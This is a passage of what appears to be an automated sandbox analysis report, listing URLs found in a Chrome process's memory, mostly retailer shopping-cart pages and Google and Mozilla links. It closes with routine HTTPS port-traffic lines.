Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.etsy.com/cart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.eyebuydirect.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.fingerhut.com/cart/index
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.finishline.com/store/cart/cart.jsp
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.freepeople.com/cart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gamestop.com/cart/
Source: chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 00000009.00000003.57225344845.0000781C02CA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57291047704.0000781C02BF8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57303602200.0000781C041A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293684924.0000781C03014000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0B
Source: chrome.exe, 00000009.00000002.57295715512.0000781C0331A000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0B4
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/0BJ
Source: chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/#safe
Source: chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CH
Source: chrome.exe, 00000009.00000002.57296679149.0000781C03438000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
Source: chrome.exe, 00000009.00000002.57301650160.0000781C03B0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/?&brand=CHy
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-features/
Source: chrome.exe, 00000009.00000002.57291343797.0000781C02C64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/browser-tools/
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
Source: chrome.exe, 00000009.00000003.57223510159.0000781C02CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57299517760.0000781C03710000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
Source: chrome.exe, 00000009.00000002.57292238414.0000781C02DD0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292673388.0000781C02E6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293381088.0000781C02F98000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://login.live.com/
Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
Source: chrome.exe, 00000009.00000002.57294047139.0000781C0309C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57288401902.0000781C02790000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290053748.0000781C02A9C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57292172189.0000781C02DB4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: chrome.exe, 00000009.00000002.57298932167.0000781C03670000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296155580.0000781C03390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296562895.0000781C0341C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/api2/aframe
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295311582.0000781C0326C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=adobe
Source: chrome.exe, 00000009.00000002.57296924837.0000781C03470000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287586656.0000781C025C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=at
Source: chrome.exe, 00000009.00000002.57293813222.0000781C03040000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297148446.0000781C03488000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57285101049.0000781C02204000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=autoit
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=bios320.exe
Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A55000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=eicar
Source: chrome.exe, 00000009.00000002.57286364303.0000781C02390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294769307.0000781C031CC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=firefox
Source: chrome.exe, 00000009.00000002.57296034126.0000781C03378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57294836975.0000781C031DC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=java
Source: chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57293010625.0000781C02EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=testzentrum
Source: chrome.exe, 00000009.00000002.57293010625.0000781C02EEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjNGMS
Source: chrome.exe, 00000009.00000002.57287720778.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57223675846.0000781C0264C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/tools/feedback/chrome/__submit
Source: chrome.exe, 00000009.00000002.57287094746.0000781C02524000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aida2
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aidaDevToolsConsoleInsights
Source: chrome.exe, 00000009.00000003.57202610379.0000781800650000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57284034256.0000781800654000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57202839824.0000781800650000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/aidax
Source: chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
Source: chrome.exe, 00000009.00000003.57253214712.00007818006CC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57249143284.0000781C03C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
Source: chrome.exe, 00000009.00000003.57223806168.0000781C032B8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286859172.0000781C02454000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.groupon.com/cart
Source: chrome.exe, 00000009.00000002.57287949667.0000781C02681000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000009.00000002.57289202473.0000781C02998000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/chrome/intelligence/assist/ranker/models/translate/2017/03/translate_ranker_
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.guitarcenter.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.homedepot.com/mycart/home
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hottopic.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.hsn.com/checkout/bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcpenney.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.jcrew.com/checkout/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.joann.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.kohls.com/checkout/shopping_cart.jsp
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.landsend.com/shopping-bag/
Source: chrome.exe, 00000009.00000002.57288458289.0000781C027A0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.llbean.com/webapp/wcs/stores/servlet/LLBShoppingCartDisplay
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lowes.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.lulus.com/checkout/bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.macys.com/my-bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.midwayusa.com/cart
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286571044.0000781C023C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
Source: chrome.exe, 00000009.00000002.57291147836.0000781C02C04000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release1.2.164946
Source: chrome.exe, 00000009.00000002.57288553025.0000781C0286C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57230873141.0000781C02864000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57228123695.0000781C02868000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000003.57231062927.0000781C02868000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release7
Source: chrome.exe, 00000009.00000002.57290354315.0000781C02B15000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298769987.0000781C03648000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57286571044.0000781C023C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295488779.0000781C032D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/#
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0
Source: chrome.exe, 00000009.00000002.57291222045.0000781C02C59000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57287280575.0000781C02568000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/0B
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/ODownload
Source: chrome.exe, 00000009.00000002.57295545247.0000781C032E4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/e
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.neimanmarcus.com/checkout/cart.jsp
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nike.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.nordstrom.com/shopping-bag
Source: chrome.exe, 00000009.00000002.57296978805.0000781C0347C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/setup
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.officedepot.com/cart/shoppingCart.do
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.opticsplanet.com/checkout/cart
Source: chrome.exe, 00000009.00000002.57293292277.0000781C02F68000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.oracle.com/search/results
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.otterbox.com/en-us/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.overstock.com/cart
Source: chrome.exe, 00000009.00000002.57290283503.0000781C02AE8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pacsun.com/on/demandware.store/Sites-pacsun-Site/default/Cart-Show
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.petsmart.com/cart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pier1.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.pokemoncenter.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.potterybarn.com/shoppingcart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.qvc.com/checkout/cart.html
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.redbubble.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rei.com/ShoppingCart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.revolve.com/r/ShoppingBag.jsp
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.rockauto.com/en/cart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.saksfifthavenue.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.samsclub.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sephora.com/basket
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.shutterfly.com/cart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.staples.com/cc/mmx/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.sweetwater.com/store/cart.php
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.talbots.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.target.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.teacherspayteachers.com/Cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.therealreal.com/cart
Source: chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.tractorsupply.com/TSCShoppingCartView
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ulta.com/bag
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.underarmour.com/en-us/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.urbanoutfitters.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.vitalsource.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walgreens.com/cart/view-ui
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.walmart.com/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.westelm.com/shoppingcart/
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wiley.com/en-us/cart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.wish.com/cart
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000009.00000002.57296352145.0000781C033D4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298227177.0000781C035C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57298288513.0000781C035D8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000009.00000002.57301333788.0000781C03AA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57297973142.0000781C03568000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57289715694.0000781C02A5B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: chrome.exe, 00000009.00000002.57300752862.0000781C03994000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.htmlult
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zappos.com/cart
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zazzle.com/co/cart
Source: chrome.exe, 00000009.00000002.57289492959.0000781C02A1B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000009.00000002.57290911658.0000781C02BC0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.zennioptical.com/shoppingCart
Source: chrome.exe, 00000009.00000002.57290459061.0000781C02B20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www2.hm.com/en_us/cart

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49767 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
